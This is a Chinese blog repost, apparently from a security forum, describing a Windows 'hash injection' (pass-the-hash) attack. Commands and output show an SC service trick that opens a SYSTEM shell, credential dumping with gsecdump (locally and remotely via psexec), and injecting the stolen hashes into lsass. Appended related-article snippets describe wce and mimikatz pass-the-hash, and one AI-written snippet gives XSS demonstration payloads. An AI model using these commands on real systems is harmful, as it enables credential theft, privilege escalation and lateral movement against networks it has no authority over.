HASH注入式攻击

最新推荐文章于 2022-06-22 14:48:35 发布
最新推荐文章于 2022-06-22 14:48:35 发布
阅读量2.7k 收藏 1
点赞数
文章标签: microsoft credentials dos 工具 delete service

文章作者:pt007[at]vip.sina.com

信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

下载网址:

http://www.truesec.com/PublicSto ... tectCookieSupport=1



To get a DOS Prompt as NT system:



C:/>sc create shellcmdline binpath= "C:/WINDOWS/system32/cmd.exe /K start" type= own type= interact

[SC] CreateService SUCCESS



C:/>sc start shellcmdline

[SC] StartService FAILED 1053:



The service did not respond to the start or control request in a timely fashion.



C:/>sc delete shellcmdline

[SC] DeleteService SUCCESS



------------



Then in the new DOS window:



Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.



C:/WINDOWS/system32>whoami

NT AUTHORITY/SYSTEM



C:/WINDOWS/system32>gsecdump -h

gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)

usage: gsecdump [options]



options:

-h [ --help ] show help

-a [ --dump_all ] dump all secrets

-l [ --dump_lsa ] dump lsa secrets

-w [ --dump_wireless ] dump microsoft wireless connections

-u [ --dump_usedhashes ] dump hashes from active logon sessions

-s [ --dump_hashes ] dump hashes from SAM/AD



Although I like to use:



PsExec v1.83 - Execute processes remotely

Copyright (C) 2001-2007 Mark Russinovich

Sysinternals - www.sysinternals.com



C:/>psexec //COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT



to get the hashes from active logon sessions of a remote system.



These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.



提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.

原文出处:http://truesecurity.se/blogs/mur ... -text-password.aspx

cnbird2008
关注
web安全专题(1)注入攻击
微生活Pro
07-02 3736
1、非对称加密算法:RSA,DSA/DSS 2、对称加密算法:AES,RC4,3DES 3、HASH算法:MD5,SHA1,SHA256
10款注入式工具
guozy_u的专栏
01-25 3274
 众所周知,SQL注入攻击是最为常见的Web应用程序攻击技术。同时SQL注入攻击所带来的安全破坏也是不可弥补的。以下罗列的10款SQL注入工具可帮助管理员及时检测存在的漏洞。 1、BSQL Hacker BSQL Hacker是由Portcullis实验室开发的,BSQL Hacker 是一个SQL自动注入工具(支持SQL盲注),其设计的目的是希望能对任何的数据库进行SQL溢出注入。 B...
啊D注入工具 v2.32 无限制版带Hash验证无后门版
01-11
啊D注入工具 v2.32 无限制版带Hash验证无后门版
[转载]HASH注入式攻击
blogfeifei
03-02 832
文章作者:pt007[at]vip.sina.com 信息来源:邪恶八进制信息安全团队(www.eviloctal.com)下载网址:http://www.truesec.com/PublicSto ... tectCookieSupport=1 http://forum.eviloctal.com/thread-34966-1-6.htmlTo get a DOS Prompt as NT s...
内网拓展——hash注入
cxrpty的博客
03-26 1288
实验原理:hash注入的原理是将我们预备好的目标机器的本地或者是域用户hash注入到本地的认证进程lsass.exe中去,使得本地在使用ipc登录目标机器的时候就如同自己登录自己的机器一样获得权限。至于目标机器的本地或者是域用户hash如何取得那就要发挥你自己的想象力了。hash注入本身是为了对付那些破解不了的NTLM HASH。 实验条件:1.需要知道目标机的计算机名 ...
wce实现hash注入
weixin_42299610的博客
03-29 852
原理: hash注入的原理是将我们预备好的目标机器的本地或者是域用户hash注入到本地的认证进程lsass.exe中去,使得本地在使用ipc登录目标机器的时候就如同自己登录自己的机器一样获得权限。至于目标机器的本地或者是域用户hash如何取得那就要发挥你自己的想象力了,hash注入本身是为了对付那些破解不了的NTLM HASH。 操作: 1.先使用wce获取一台内网机器的hash值,太复杂无...
windows hash注入
weixin_34080903的博客
04-24 265
前提: 1.获取到目标的管理员帐户hash 2.目标开放了默认共享端口 实施: 1.使用wce工具把目标的sessions设置为当前的session wce -s Administrator:500:×××87EEB66D08E08770:×××E22B1DFBFA6072 ps:可使用psexec.exe工具, 在建立共享连接后,直接使用psexe...
常见的Web攻击方式:SQL注入、XSS跨站脚本攻击、CSRF跨站点请求伪造
学习
07-07 7356
常见的Web攻击有SQL注入、XSS跨站脚本攻击、跨站点请求伪造共三类,下面分别简单介绍。 1 SQL注入 1.1 原理        SQL注入就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。SQL注入漏洞到底是以怎样的形式进行攻击的呢,接下来将以一个简单的实例来进行介绍。   &...
深入理解反射式dll注入技术
m0_67698950的博客
06-22 1817
前言dll 注入技术是让某个进程主动加载指定的 dll 的技术。恶意软件为了提高隐蔽性,通常会使用 dll 注入技术将自身的恶意代码以 dll 的形式注入高可信进程。常规的 dll 注入技术使用 LoadLibraryA() 函数来使被注入进程加载指定的 dll。常规dll注入的方式一个致命的缺陷是需要恶意的 dll 以文件的形式存储在受害者主机上。这样使得常规 dll 注入技术在受害者主机上留下痕迹较大,很容易被 edr 等安全产品检测到。为了弥补这个缺陷,stephen fewer 提出了反射式 dll
jQuery Mobile漏洞会有跨站脚本攻击风险
12-11
当jQuery Mobile检测到一个类似URL的`location.hash`时,它会尝试用XMLHttpRequest进行请求,使用innerHTML处理响应,这为XSS注入提供了可能。 攻击过程大致如下: 1. 检查`location.hash`属性。 2. 如果`...
从注册表导取Windows-hash方法-到-远程HASH注入.docx
10-10
从注册表导取Windows-hash方法-到-远程HASH注入.docx
WCE注入工具
05-24
WIN 2008环境下,用WCE获取管理员密码
域渗透之pth hash传递攻击
热门推荐
weixin_45612728的博客
02-05 1万+
当你拿到了一台服务器的权限,然后使用mimikatz进行读取hash也就是密文,读取到了有admin这个账号,接着把账号和hash注入到内存当中,使用mimikatz把hash传递给另外一台服务器,且打开一个cmd,说得简单一点就是撞他,赌他们是一样hash和账号的. 下面实验分别是一台08域控和一台win7 我们需要通过win7读取hash,然后去撞域控的hash值. 导出hash mimikatz.exe "privilege::debug" "lsadump::lsa /patch" exit
wcehash注入
crystal0011的专栏
05-13 2549
哈希注入工具wce   2011-10-06 18:58:18|  分类: 默认分类|字号 订阅 (1)攻击者第一步首先需要从受害者机器获取hash pwdump gsecdump等 普通机器:(192.168.0.102)通常是我们获得的某台肉鸡,通常为普通的webserver,不处于域中 获取方式: social engine
域渗透 HASH注入 keimpx
课嗨教育的专栏
11-14 1715
2003 域管理 1.1.1.10 win2 1 1.1.1.6 win2 2 1.1.1.7 apt-get install mingw32 关于域 如果企业网络中计算机和用户数量较多时,要实现高效管理,就需要windows域。 域和组的区别 工作组是一群计算机的集合,它仅仅是一个逻辑的集合,各自计算机还是各自管理的,你要访问其中的计算机,还是要到被访问计算机上来实现用户验证的。而域不同,域是一个有安全边界的计算机集合,在同一个域中的计算机彼此之间已经建立了信任关系,在域内访问其他机器,不再需
哈希注入工具wce 实战应用
weixin_30852419的博客
08-16 175
http://hxhack510.blog.163.com/blog/static/1725079322010101983752953/ 转载于:https://www.cnblogs.com/mujj/articles/3916804.html
内网渗透防御:如何防御Hash注入攻击
weixin_33811539的博客
05-13 291
2019独角兽企业重金招聘Python工程师标准>>> ...
一致性哈希机器在分布式中的作用
imzoer的专栏
10-09 6841
哈希算法是根据hash值将不同的value映射到相应的位置的过程。 那么在分布式中,【比如memcached】,需要将不同的缓存对象按照相应的hash算法映射到相应的机器上去,那么当添加一台机器或者是其中某一台机器宕机之后,如果按照最原始的key%n的形式来做hash的话,需要将缓存清空,然后重新将内容映射到所有的机器上,这样的代价是巨大的。 于是粗线了一致性哈希。简单来说,一致性哈希将整个哈
SQL注入原理深度解析
tangyangbuaa的专栏
06-20 470
<br />转自http://blog.ixpub.net/html/99/7678999-337915.html<br /> <br />对于Web应用来说,注射式攻击由来已久,攻击方式也五花八门,常见的攻击方式有SQL 注 射、命令注射以及新近才出现的XPath注射等等。本文将以SQL注射为例,在源码级对其攻击原 理 进行深入的讲解。<br />一、注射式攻击的原理<br />注射式攻击的根源在 于,程序命令和用户数据(即用户输入)之间没有做到泾渭分明。这使得攻击者有机会将程序命令当作用户输入
我想使用XSSchallenge来演示插入式存储式DOM的xss攻击,该怎么做
最新发布
03-16
<think>好的,我现在需要帮助用户了解如何使用XSS Challenge来演示插入式、存储式和DOM型的XSS攻击。首先,我得理清用户的需求,他们可能想通过一个具体的挑战平台展示这三种不同类型的XSS攻击方法。但用户提到的“XSS Challenge”可能指的是某个特定的练习平台,比如类似Google的XSS游戏,或者其他的在线挑战。如果用户指的是一个通用的挑战环境,可能需要先搭建一个本地环境或使用现有的在线平台。 首先,我需要确认用户是否有自己的XSS Challenge环境,或者是否需要推荐一个。假设用户已经有一个目标环境,比如自己搭建的漏洞测试应用,或者是某个在线挑战平台。接下来,我需要分别解释三种攻击类型的具体步骤,提供示例。 插入式(反射型)XSS通常出现在URL参数中,攻击载荷立即反映在响应页面里,不需要存储。例如,在搜索框中注入脚本。存储式XSS则是将恶意脚本保存到服务器,比如评论字段,每次访问页面都会执行。DOM型XSS则是通过修改DOM环境而不经过服务器处理,完全在客户端执行。 然后,我需要考虑如何针对每种类型给出具体的攻击示例。例如,反射型可能通过构造一个带有<script>标签的URL,存储型可能在用户输入的地方提交恶意脚本,而DOM型可能利用如document.write或innerHTML来触发。 同时,必须提醒用户注意法律和道德规范,只能在授权环境下进行测试,避免实际攻击他人系统。此外,建议使用测试用的Payload,比如alert('XSS'),而不是更具破坏性的代码。 可能还需要解释如何搭建一个简单的测试环境,如果用户没有现成的,比如用Node.js和Express创建一个有漏洞的网页应用,包含易受攻击的输入点。例如,一个搜索页面反射输入,一个评论系统存储输入,以及一个通过URL参数修改DOM的页面部分。 在结构上,需要分步骤说明每种攻击的实施方法,可能包括代码示例、测试步骤和预期结果。同时,确保使用正确的中文术语,遵循系统级指令中的LaTeX格式要求,例如变量用$...$包裹,独立公式用$$...$$。 最后,确保回答清晰,逐步引导用户理解每种攻击类型的原理和实现方式,同时强调合法性和道德考虑。</think>以下是分步骤的XSS攻击演示方法(请确保在合法授权环境中操作): 一、环境准备 1. 搭建/使用XSS Challenge测试平台(推荐DVWA/XSS游戏) 2. 开启浏览器开发者工具(F12),用于调试和观察 二、反射型XSS演示 1. 在URL参数注入: ```text http://vulnerable-site.com/search?query=<script>alert('反射型XSS')</script> ``` 2. 观察弹出窗口,说明未过滤输入直接输出 三、存储型XSS演示 1. 寻找用户内容提交点(如评论框): ```html <textarea> <img src=x onerror=alert('存储型XSS')> </textarea> ``` 2. 提交后刷新页面,脚本持续触发 四、DOM型XSS演示 1. 查找客户端脚本处理点: ```javascript // 假设存在漏洞代码 document.write('<div>'+window.location.hash.slice(1)+'</div>'); ``` 2. 构造URL: ```text http://vulnerable-site.com#<img src=x onerror=alert('DOM型XSS')> ``` 五、防御对比演示 1. 服务端过滤前后对比: ```php // 过滤前 echo $_GET['input']; // 过滤后 echo htmlspecialchars($_GET['input'], ENT_QUOTES); ``` 2. 使用$$encodeURIComponent(window.location.hash)$$进行URL编码 注意事项: 1. 始终在授权环境测试 2. 建议使用$\text{alert(1)}$而非危险操作 3. 现代浏览器内置XSS过滤器可能影响演示,需禁用或调整安全级别 扩展学习: 1. CSP策略对比:$$Content-Security-Policy: default-src 'self'$$ 2. 使用$\text{<template>}$标签安全渲染内容 3. 推荐OWASP Cheat Sheet作为防御参考 请根据实际测试环境调整具体Payload,建议配合开发者工具的Console和Network面板进行实时调试分析。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值